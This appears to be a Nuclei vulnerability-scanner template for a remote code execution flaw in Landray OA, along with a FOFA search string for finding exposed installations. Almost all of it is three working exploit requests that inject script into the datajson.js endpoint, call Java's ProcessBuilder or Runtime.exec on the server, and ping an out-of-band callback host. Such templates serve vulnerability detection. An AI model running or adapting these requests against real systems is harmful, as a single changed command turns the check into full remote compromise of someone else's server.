http:
    - extractors:
        - kval:
            - interactsh_ip
          type: kval
      matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
        - condition: and
          type: word
          words:
            - success":true
      matchers-condition: and
      raw:
        - |
          POST /data/sys-common/datajson.js HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          s_bean=sysFormulaSimulateByJS&script=new java.lang.ProcessBuilder("ping","{{interactsh-url}}").start()&type=1
        - |
          POST /data/sys-common/datajson.js HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          s_bean=sysFormulaSimulateByJS&script=function%20test(){%20return%20java.lang.Runtime};r=test();r.getRuntime().exec("ping%20-c%204%20{{interactsh-url}}")&type=1
        - |
          POST /data/sys-common/datajson.js HTTP/1.1
          Host: {{Hostname}}
          Content-Type: application/x-www-form-urlencoded

          s_bean=sysFormulaSimulateByJS&script=var+calc='ping+{{interactsh-url}}';java.lang.Runtime.getRuntime().exec(calc)&type=1
id: landray-oa-datajson-rce
info:
    author: SleepingBag945
    description: |
        FOFA: app="Landray-OA系统"
    name: Landray OA Datajson RCE
    reference:
        - https://www.cnsuc.net/thread-553.htm
    severity: critical
    tags:
        - landray
        - Oce
        - LandRay-OA
